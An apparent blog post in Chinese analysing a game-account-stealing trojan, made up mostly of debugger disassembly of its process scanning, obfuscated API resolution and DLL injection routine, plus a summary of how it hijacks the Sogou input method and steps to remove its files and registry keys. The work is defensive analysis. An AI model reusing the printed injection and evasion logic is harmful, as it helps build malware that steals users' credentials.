10009233 889D 9CFCFFFF mov byte ptr [ebp-364], bl
10009239 6A 0F push 0F
1000923B 59 pop ecx
1000923C 33C0 xor eax, eax
1000923E 8DBD 9DFCFFFF lea edi, dword ptr [ebp-363]
10009244 F3:AB rep stos dword ptr es:[edi]
10009246 66:AB stos word ptr es:[edi]
10009248 AA stos byte ptr es:[edi]
10009249 68 683D0010 push 10003D68 ; ASCII "ldjgam"
1000924E 8D85 9CFCFFFF lea eax, dword ptr [ebp-364]
10009254 50 push eax
10009255 E8 781B0000 call <jmp.&MSVCRT.strcpy>
1000925A 68 603D0010 push 10003D60 ; ASCII "e.exe"
1000925F 8D85 9CFCFFFF lea eax, dword ptr [ebp-364]
10009265 50 push eax
10009266 E8 5B1B0000 call <jmp.&MSVCRT.strcat>
1000926B 83C4 18 add esp, 18
1000926E 889D 8CF9FFFF mov byte ptr [ebp-674], bl
10009274 6A 40 push 40
10009276 59 pop ecx
10009277 33C0 xor eax, eax
10009279 8DBD 8DF9FFFF lea edi, dword ptr [ebp-673]
1000927F F3:AB rep stos dword ptr es:[edi]
10009281 66:AB stos word ptr es:[edi]
10009283 AA stos byte ptr es:[edi]
10009284 889D 90FAFFFF mov byte ptr [ebp-570], bl
1000928A 6A 40 push 40
1000928C 59 pop ecx
1000928D 33C0 xor eax, eax
1000928F 8DBD 91FAFFFF lea edi, dword ptr [ebp-56F]
10009295 F3:AB rep stos dword ptr es:[edi]
10009297 66:AB stos word ptr es:[edi]
10009299 AA stos byte ptr es:[edi]
1000929A 889D DCFCFFFF mov byte ptr [ebp-324], bl
100092A0 6A 40 push 40
100092A2 59 pop ecx
100092A3 33C0 xor eax, eax
100092A5 8DBD DDFCFFFF lea edi, dword ptr [ebp-323]
100092AB F3:AB rep stos dword ptr es:[edi]
100092AD 66:AB stos word ptr es:[edi]
100092AF AA stos byte ptr es:[edi]
100092B0 895D FC mov dword ptr [ebp-4], ebx
100092B3 399D 94FBFFFF cmp dword ptr [ebp-46C], ebx
100092B9 0F84 B2010000 je 10009471
100092BF 889D 88F8FFFF mov byte ptr [ebp-778], bl
100092C5 6A 40 push 40
100092C7 59 pop ecx
100092C8 33C0 xor eax, eax
100092CA 8DBD 89F8FFFF lea edi, dword ptr [ebp-777]
100092D0 F3:AB rep stos dword ptr es:[edi]
100092D2 66:AB stos word ptr es:[edi]
100092D4 AA stos byte ptr es:[edi]
100092D5 8D85 88F8FFFF lea eax, dword ptr [ebp-778]
100092DB 50 push eax
100092DC E8 6DFBFFFF call 10008E4E ; 步過
100092E1 59 pop ecx
100092E2 48 dec eax
100092E3 F7D8 neg eax
100092E5 1BC0 sbb eax, eax
100092E7 F7D8 neg eax
100092E9 8985 94FBFFFF mov dword ptr [ebp-46C], eax
100092EF 0F85 A3010000 jnz 10009498
100092F5 C685 80F6FFFF 6>mov byte ptr [ebp-980], 64 ; d
100092FC C685 81F6FFFF 7>mov byte ptr [ebp-97F], 73 ; s
10009303 C685 82F6FFFF 6>mov byte ptr [ebp-97E], 6F ; o
1000930A C685 83F6FFFF 7>mov byte ptr [ebp-97D], 75 ; u
10009311 C685 84F6FFFF 6>mov byte ptr [ebp-97C], 6E ; n
10009318 C685 85F6FFFF 6>mov byte ptr [ebp-97B], 64 ; d
1000931F C685 86F6FFFF 2>mov byte ptr [ebp-97A], 2E ; .
10009326 C685 87F6FFFF 6>mov byte ptr [ebp-979], 64 ; d
1000932D C685 88F6FFFF 6>mov byte ptr [ebp-978], 6C ; l
10009334 C685 89F6FFFF 6>mov byte ptr [ebp-977], 6C ; l
1000933B 889D 8AF6FFFF mov byte ptr [ebp-976], bl
10009341 8BCE mov ecx, esi
10009343 33C0 xor eax, eax
10009345 8DBD 8BF6FFFF lea edi, dword ptr [ebp-975]
1000934B F3:AB rep stos dword ptr es:[edi]
1000934D AA stos byte ptr es:[edi]
1000934E C685 84F7FFFF 6>mov byte ptr [ebp-87C], 64 ; d
10009355 C685 85F7FFFF 6>mov byte ptr [ebp-87B], 64 ; d
1000935C C685 86F7FFFF 7>mov byte ptr [ebp-87A], 72 ; r
10009363 C685 87F7FFFF 6>mov byte ptr [ebp-879], 61 ; a
1000936A C685 88F7FFFF 7>mov byte ptr [ebp-878], 77 ; w
10009371 C685 89F7FFFF 2>mov byte ptr [ebp-877], 2E ; .
10009378 C685 8AF7FFFF 6>mov byte ptr [ebp-876], 64 ; d
1000937F C685 8BF7FFFF 6>mov byte ptr [ebp-875], 6C ; l
10009386 C685 8CF7FFFF 6>mov byte ptr [ebp-874], 6C ; l
1000938D 889D 8DF7FFFF mov byte ptr [ebp-873], bl
10009393 8BCE mov ecx, esi
10009395 33C0 xor eax, eax
10009397 8DBD 8EF7FFFF lea edi, dword ptr [ebp-872]
1000939D F3:AB rep stos dword ptr es:[edi]
1000939F 66:AB stos word ptr es:[edi]
100093A1 C685 7CF5FFFF 6>mov byte ptr [ebp-A84], 63 ; c
100093A8 C685 7DF5FFFF 6>mov byte ptr [ebp-A83], 6F ; o
100093AF C685 7EF5FFFF 6>mov byte ptr [ebp-A82], 6D ; m
100093B6 C685 7FF5FFFF 7>mov byte ptr [ebp-A81], 72 ; r
100093BD C685 80F5FFFF 6>mov byte ptr [ebp-A80], 65 ; e
100093C4 C685 81F5FFFF 7>mov byte ptr [ebp-A7F], 73 ; s
100093CB C685 82F5FFFF 2>mov byte ptr [ebp-A7E], 2E ; .
100093D2 C685 83F5FFFF 6>mov byte ptr [ebp-A7D], 64 ; d
100093D9 C685 84F5FFFF 6>mov byte ptr [ebp-A7C], 6C ; l
100093E0 C685 85F5FFFF 6>mov byte ptr [ebp-A7B], 6C ; l
100093E7 889D 86F5FFFF mov byte ptr [ebp-A7A], bl
100093ED 8BCE mov ecx, esi
100093EF 33C0 xor eax, eax
100093F1 8DBD 87F5FFFF lea edi, dword ptr [ebp-A79]
100093F7 F3:AB rep stos dword ptr es:[edi]
100093F9 AA stos byte ptr es:[edi]
100093FA 8D85 88F8FFFF lea eax, dword ptr [ebp-778]
10009400 50 push eax
10009401 8D85 8CF9FFFF lea eax, dword ptr [ebp-674]
10009407 50 push eax
10009408 E8 C5190000 call <jmp.&MSVCRT.strcpy>
1000940D 8D85 88F8FFFF lea eax, dword ptr [ebp-778]
10009413 50 push eax
10009414 8D85 90FAFFFF lea eax, dword ptr [ebp-570]
1000941A 50 push eax
1000941B E8 B2190000 call <jmp.&MSVCRT.strcpy>
10009420 8D85 88F8FFFF lea eax, dword ptr [ebp-778]
10009426 50 push eax
10009427 8D85 DCFCFFFF lea eax, dword ptr [ebp-324]
1000942D 50 push eax
1000942E E8 9F190000 call <jmp.&MSVCRT.strcpy>
10009433 8D85 80F6FFFF lea eax, dword ptr [ebp-980]
10009439 50 push eax
1000943A 8D85 8CF9FFFF lea eax, dword ptr [ebp-674]
10009440 50 push eax
10009441 E8 80190000 call <jmp.&MSVCRT.strcat>
10009446 8D85 84F7FFFF lea eax, dword ptr [ebp-87C]
1000944C 50 push eax
1000944D 8D85 90FAFFFF lea eax, dword ptr [ebp-570]
10009453 50 push eax
10009454 E8 6D190000 call <jmp.&MSVCRT.strcat>
10009459 8D85 7CF5FFFF lea eax, dword ptr [ebp-A84]
1000945F 50 push eax
10009460 8D85 DCFCFFFF lea eax, dword ptr [ebp-324]
10009466 50 push eax
10009467 E8 5A190000 call <jmp.&MSVCRT.strcat>
1000946C 83C4 30 add esp, 30
1000946F EB 27 jmp short 10009498
10009471 8D85 8CF9FFFF lea eax, dword ptr [ebp-674]
10009477 50 push eax
10009478 E8 AAF9FFFF call 10008E27
1000947D 8D85 90FAFFFF lea eax, dword ptr [ebp-570]
10009483 50 push eax
10009484 E8 9EF9FFFF call 10008E27
10009489 8D85 DCFCFFFF lea eax, dword ptr [ebp-324]
1000948F 50 push eax
10009490 E8 92F9FFFF call 10008E27
10009495 83C4 0C add esp, 0C
10009498 8D85 E0FDFFFF lea eax, dword ptr [ebp-220]
1000949E 50 push eax
1000949F 8D85 9CFCFFFF lea eax, dword ptr [ebp-364]
100094A5 50 push eax
100094A6 E8 4EADFFFF call 100041F9 ; 判斷進程中有沒有ldjgame這個進程
100094AB 59 pop ecx
100094AC 59 pop ecx
100094AD 6A 0A push 0A
100094AF 8B3D B0300010 mov edi, dword ptr [<&KERNEL32.Sleep>] ; kernel32.Sleep
100094B5 FFD7 call edi
100094B7 8D85 E0FDFFFF lea eax, dword ptr [ebp-220]
100094BD 50 push eax
100094BE 68 703D0010 push 10003D70 ; ASCII "launch.exe"
100094C3 E8 31ADFFFF call 100041F9
100094C8 59 pop ecx
100094C9 59 pop ecx
100094CA 6A 0A push 0A
100094CC FFD7 call edi
100094CE 6A 0A push 0A
100094D0 FFD7 call edi
100094D2 6A 01 push 1
100094D4 8D85 E4FEFFFF lea eax, dword ptr [ebp-11C]
100094DA 50 push eax
100094DB E8 EF110000 call 1000A6CF ; 遍歷進程,查找imeutil.exe
100094E0 6A 01 push 1
100094E2 8D85 98FBFFFF lea eax, dword ptr [ebp-468]
100094E8 50 push eax
100094E9 E8 E1110000 call 1000A6CF ; 遍歷進程查找sgtool.exe
100094EE 83C4 10 add esp, 10
100094F1 68 E6030000 push 3E6
100094F6 FFD7 call edi
100094F8 ^ E9 B6FDFFFF jmp 100092B3
100094FD 6A 01 push 1
100094FF 58 pop eax
10009500 C3 retn
10009501 8B65 E8 mov esp, dword ptr [ebp-18]
10009504 834D FC FF or dword ptr [ebp-4], FFFFFFFF
10009508 33C0 xor eax, eax
1000950A 8B4D F0 mov ecx, dword ptr [ebp-10]
1000950D 64:890D 0000000>mov dword ptr fs:[0], ecx
10009514 5F pop edi
10009515 5E pop esi
10009516 5B pop ebx
10009517 C9 leave
10009518 C2 0400 retn 4




到call100041F9看看:
100041F9 55 push ebp
100041FA 8BEC mov ebp, esp
100041FC 81EC 68010000 sub esp, 168
10004202 8365 C0 00 and dword ptr [ebp-40], 0
10004206 8065 DC 00 and byte ptr [ebp-24], 0
1000420A 8065 EE 00 and byte ptr [ebp-12], 0
1000420E 8065 FD 00 and byte ptr [ebp-3], 0
10004212 53 push ebx
10004213 56 push esi
10004214 8B35 10310010 mov esi, dword ptr [<&KERNEL32.LoadL>; kernel32.LoadLibraryA
1000421A 8D45 C4 lea eax, dword ptr [ebp-3C]
1000421D 57 push edi
1000421E BB 40320010 mov ebx, 10003240 ; ASCII "Kernel32.dll"
10004223 50 push eax
10004224 53 push ebx
10004225 C645 C4 43 mov byte ptr [ebp-3C], 43
10004229 C645 C5 72 mov byte ptr [ebp-3B], 72
1000422D C645 C6 65 mov byte ptr [ebp-3A], 65
10004231 C645 C7 61 mov byte ptr [ebp-39], 61
10004235 C645 C8 74 mov byte ptr [ebp-38], 74
10004239 C645 C9 65 mov byte ptr [ebp-37], 65
1000423D C645 CA 54 mov byte ptr [ebp-36], 54
10004241 C645 CB 6F mov byte ptr [ebp-35], 6F
10004245 C645 CC 6F mov byte ptr [ebp-34], 6F
10004249 C645 CD 6C mov byte ptr [ebp-33], 6C
1000424D C645 CE 68 mov byte ptr [ebp-32], 68
10004251 C645 CF 65 mov byte ptr [ebp-31], 65
10004255 C645 D0 6C mov byte ptr [ebp-30], 6C
10004259 C645 D1 70 mov byte ptr [ebp-2F], 70
1000425D C645 D2 33 mov byte ptr [ebp-2E], 33
10004261 C645 D3 32 mov byte ptr [ebp-2D], 32
10004265 C645 D4 53 mov byte ptr [ebp-2C], 53
10004269 C645 D5 6E mov byte ptr [ebp-2B], 6E
1000426D C645 D6 61 mov byte ptr [ebp-2A], 61
10004271 C645 D7 70 mov byte ptr [ebp-29], 70
10004275 C645 D8 73 mov byte ptr [ebp-28], 73
10004279 C645 D9 68 mov byte ptr [ebp-27], 68
1000427D C645 DA 6F mov byte ptr [ebp-26], 6F
10004281 C645 DB 74 mov byte ptr [ebp-25], 74
10004285 C645 E​​0 50 mov byte ptr [ebp-20], 50
10004289 C645 E​​1 72 mov byte ptr [ebp-1F], 72
1000428D C645 E​​2 6F mov byte ptr [ebp-1E], 6F
10004291 C645 E​​3 63 mov byte ptr [ebp-1D], 63
10004295 C645 E​​4 65 mov byte ptr [ebp-1C], 65
10004299 C645 E​​5 73 mov byte ptr [ebp-1B], 73
1000429D C645 E​​6 73 mov byte ptr [ebp-1A], 73
100042A1 C645 E​​7 33 mov byte ptr [ebp-19], 33
100042A5 C645 E​​8 32 mov byte ptr [ebp-18], 32
100042A9 C645 E​​9 46 mov byte ptr [ebp-17], 46
100042AD C645 E​​A 69 mov byte ptr [ebp-16], 69
100042B1 C645 E​​B 72 mov byte ptr [ebp-15], 72
100042B5 C645 E​​C 73 mov byte ptr [ebp-14], 73
100042B9 C645 E​​D 74 mov byte ptr [ebp-13], 74
100042BD C645 F0 50 mov byte ptr [ebp-10], 50
100042C1 C645 F1 72 mov byte ptr [ebp-F], 72
100042C5 C645 F2 6F mov byte ptr [ebp-E], 6F
100042C9 C645 F3 63 mov byte ptr [ebp-D], 63
100042CD C645 F4 65 mov byte ptr [ebp-C], 65
100042D1 C645 F5 73 mov byte ptr [ebp-B], 73
100042D5 C645 F6 73 mov byte ptr [ebp-A], 73
100042D9 C645 F7 33 mov byte ptr [ebp-9], 33
100042DD C645 F8 32 mov byte ptr [ebp-8], 32
100042E1 C645 F9 4E mov byte ptr [ebp-7], 4E
100042E5 C645 FA 65 mov byte ptr [ebp-6], 65
100042E9 C645 FB 78 mov byte ptr [ebp-5], 78
100042ED C645 FC 74 mov byte ptr [ebp-4], 74
100042F1 FFD6 call esi
100042F3 8B3D 14310010 mov edi, dword ptr [<&KERNEL32.GetPr>; kernel32.GetProcAddress
100042F9 50 push eax
100042FA FFD7 call edi
100042FC 83E8 03 sub eax, 3
100042FF A3 C4110010 mov dword ptr [100011C4], eax
10004304 8D45 E0 lea eax, dword ptr [ebp-20]
10004307 50 push eax
10004308 53 push ebx
10004309 FFD6 call esi
1000430B 50 push eax
1000430C FFD7 call edi
1000430E 48 dec eax
1000430F 48 dec eax
10004310 A3 C8110010 mov dword ptr [100011C8], eax
10004315 8D45 F0 lea eax, dword ptr [ebp-10]
10004318 50 push eax
10004319 53 push ebx
1000431A FFD6 call esi
1000431C 50 push eax
1000431D FFD7 call edi
1000431F 83E8 03 sub eax, 3
10004322 33F6 xor esi, esi
10004324 A3 CC110010 mov dword ptr [100011CC], eax
10004329 A1 C4110010 mov eax, dword ptr [100011C4]
1000432E 3BC6 cmp eax, esi
10004330 74 09 je short 1000433B
10004332 56 push esi
10004333 6A 02 push 2
10004335 FFD0 call eax
10004337 8BF8 mov edi, eax
10004339 EB 03 jmp short 1000433E
1000433B 8B7D 08 mov edi, dword ptr [ebp+8]
1000433E 83FF FF cmp edi, -1
10004341 75 04 jnz short 10004347
10004343 33C0 xor eax, eax
10004345 EB 73 jmp short 100043BA
10004347 8D85 98FEFFFF lea eax, dword ptr [ebp-168]
1000434D C785 98FEFFFF 2>mov dword ptr [ebp-168], 128
10004357 50 push eax
10004358 57 push edi
10004359 FF15 C8110010 call dword ptr [100011C8] ; kernel32.7C864F53
1000435F 85C0 test eax, eax
10004361 74 4E je short 100043B1
10004363 8D85 BCFEFFFF lea eax, dword ptr [ebp-144]
10004369 50 push eax
1000436A FF75 08 push dword ptr [ebp+8] ; 判斷進程中有沒有ldjgame.exe
1000436D FF15 9C310010 call dword ptr [<&MSVCRT._stricmp>] ; msvcrt._stricmp
10004373 59 pop ecx
10004374 85C0 test eax, eax
10004376 59 pop ecx
10004377 75 23 jnz short 1000439C
10004379 FFB5 A0FEFFFF push dword ptr [ebp-160]
1000437F E8 80FDFFFF call 10004104
10004384 85C0 test eax, eax
10004386 59 pop ecx
10004387 75 10 jnz short 10004399
10004389 FF75 0C push dword ptr [ebp+C]
1000438C FFB5 A0FEFFFF push dword ptr [ebp-160]
10004392 E8 B8050000 call 1000494F ;實現注入
10004397 59 pop ecx
10004398 59 pop ecx
10004399 FF45 C0 inc dword ptr [ebp-40]
1000439C 8D85 98FEFFFF lea eax, dword ptr [ebp-168]
100043A2 50 push eax
100043A3 57 push edi
100043A4 FF15 CC110010 call dword ptr [100011CC] ; kernel32.7C8650C5
100043AA 85C0 test eax, eax
100043AC ^ 75 B5 jnz short 10004363
100043AE 8B75 C0 mov esi, dword ptr [ebp-40]
100043B1 57 push edi
100043B2 FF15 30310010 call dword ptr [<&KERNEL32.CloseHandl>; kernel32.CloseHandle
100043B8 8BC6 mov eax, esi
100043BA 5F pop edi
100043BB 5E pop esi
100043BC 5B pop ebx
100043BD C9 leave
100043BE C3 retn



總結一下:母體文件釋放兩個ocx文件,並將文件注入到explorer.exe中,通過創建進程gbvgbv31.exe來運行兩個ocx文件

dbr99008.ocx文件主要是改輸入法註冊表,將其與輸入法關聯

dbr31004.ocx文件就是主要做壞事盜號了,主要是劫持搜狗輸入法實現注入到進程中

要想清理的話,可以用xuetr結束掉explorer.exe中的dbr99008.ocx,dbr31004.ocx的線程,然後刪除文件,gbvgbv31這個可以刪,不影響

再就是刪除註冊表項
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Keyboard Layouts\E0200804
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\E0200804

[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Keyboard Layouts\E0200804]
Ime File = "DBR99008.OCX"
Layout Text = "US"
Layout File = "kbdus.dll"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\E0200804]
Ime File = "DBR99008.OCX"
Layout Text = "US"
Layout File = "kbdus.dll"
[HKEY_CURRENT_USER\Keyboard Layout\Preload]
2 = "E0200804"

這個dbr31004.ocx在這裡很粗略,當初我都詳細分析了,一激動清理UDD的全沒了
哎,分析第一次的時候,記錄全部沒有了,靠記憶分析的這些,悲催
還有就是上面說的執行後,母體文件變形的問題,我又看了下變形的母體文件,開始是一個jmp,
然後又重新向004126E0這里通過WriteProcessMemoryA寫入PE頭,重新回到恢復5個字節!
不懂這是怎麼回事....
簡單寫了點代碼,大部分百度,不會編程的菜鳥真是傷不起啊,悲催!
主要就是卸載注入到explorer.exe中的dll文件了,還有就是修改部分註冊表,這個函數不是熟悉,也沒敢亂寫

没有评论:

发表评论